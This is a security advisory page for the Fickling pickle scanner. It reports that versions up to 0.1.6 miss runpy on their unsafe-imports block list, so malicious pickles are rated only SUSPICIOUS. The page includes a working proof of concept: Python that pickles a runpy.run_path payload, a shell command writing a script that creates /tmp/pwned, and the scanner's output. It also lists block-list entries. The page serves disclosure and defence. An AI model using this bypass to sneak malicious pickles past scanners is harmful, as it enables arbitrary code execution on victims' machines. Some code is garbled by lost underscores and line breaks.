GHSA-wfq2-52f7-7qvj

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Source
https://github.com/advisories/GHSA-wfq2-52f7-7qvj
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-wfq2-52f7-7qvj/GHSA-wfq2-52f7-7qvj.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-wfq2-52f7-7qvj
Aliases
Published
2026-01-09T20:52:40Z
Modified
2026-02-03T03:15:12.348746Z
Severity
  • 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Fickling has a bypass via runpy.run_path() and runpy.run_module()
Details

Fickling's assessment

runpy was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66).

Original report

Summary

Fickling versions up to and including 0.1.6 do not treat Python’s runpy module as unsafe. Because of this, a malicious pickle that uses runpy.runpath() or runpy.runmodule() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.

If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.

This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.

Details

The runpy module is missing from fickling's block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).

Incriminated source code: - File: fickling/analysis.py - Class: UnsafeImports - Issue: The blocklist does not include runpy, runpy.run_path, runpy.run_module, or runpy._run_code

Reference to similar fix: - PR #187 added pty to the blocklist to fix CVE-2025-67748 - PR #108 documented the blocklist approach - The same fix pattern should be applied for runpy

How the bypass works: 1. Attacker creates a pickle using runpy.run_path() in __reduce__ 2. Fickling's UnsafeImports analysis does not flag runpy as dangerous 3. Only the UnusedVariables heuristic triggers, resulting in SUSPICIOUS severity 4. The pickle should be rated OVERTLY_MALICIOUS like os.system, eval, and exec

Tested behavior (fickling 0.1.6):

| Function | Fickling Severity | RCE Capable | |-------------------|----------------------------|-------------| | os.system | LIKELYOVERTLYMALICIOUS | Yes | | eval | OVERTLYMALICIOUS | Yes | | exec | OVERTLYMALICIOUS | Yes | | runpy.runpath | SUSPICIOUS | Yes ← BYPASS | | runpy.runmodule | SUSPICIOUS | Yes ← BYPASS |

Suggested fix: Add to the unsafe imports blocklist in fickling/analysis.py: - runpy - runpy.runpath - runpy.runmodule - runpy.runcode - runpy.runmodule_code

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.Environment: - Python 3.13.2 - fickling 0.1.6 (latest version, installed via pip)

Step 1: Create malicious pickle

import pickle import runpy

class MaliciousPayload: def reduce(self): return (runpy.runpath, ("/tmp/maliciousscript.py",))

with open("malicious.pkl", "wb") as f: pickle.dump(MaliciousPayload(), f)

Step 2: Create the malicious script that will be executed

echo 'print("RCE ACHIEVED"); open("/tmp/pwned","w").write("compromised")' > /tmp/malicious_script.py

Step 3: Analyze with fickling

fickling --check-safety malicious.pkl

Expected output (if properly detected): Severity: OVERTLY_MALICIOUS

Actual output (bypass confirmed): { "severity": "SUSPICIOUS", "analysis": "Variable _var0 is assigned value run_path(...) but unused afterward; this is suspicious and indicative of a malicious pickle file", "detailed_results": { "AnalysisResult": { "UnusedVariables": ["var0", "runpath(...)"] } } }

Step 4: Prove RCE by loading the pickle

import pickle pickle.load(open("malicious.pkl", "rb"))

Check: ls /tmp/pwned <-- file exists, proving code execution

Pickle disassembly (evidence):

0: \x80 PROTO      4
2: \x95 FRAME      92

11: \x8c SHORTBINUNICODE 'runpy' 18: \x94 MEMOIZE (as 0) 19: \x8c SHORTBINUNICODE 'runpath' 29: \x94 MEMOIZE (as 1) 30: \x93 STACKGLOBAL 31: \x94 MEMOIZE (as 2) 32: \x8c SHORTBINUNICODE '/tmp/maliciousscript.py' ... 100: R REDUCE 101: \x94 MEMOIZE (as 5) 102: . STOP

Impact

Vulnerability Type: Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).

Who is impacted: Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:

Attack scenario: An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.

Severity: HIGH - The attacker achieves arbitrary code execution - The security control (fickling) is specifically designed to prevent this - The bypass requires no special conditions beyond crafting the pickle with runpy

Database specific
{
    "github_reviewed_at": "2026-01-09T20:52:40Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-184",
        "CWE-502"
    ],
    "nvd_published_at": "2026-01-10T02:15:49Z",
    "severity": "HIGH"
}
References

Affected packages

PyPI / fickling

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.1.7

Affected versions

0.*
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-wfq2-52f7-7qvj/GHSA-wfq2-52f7-7qvj.json"
last_known_affected_version_range
"<= 0.1.6"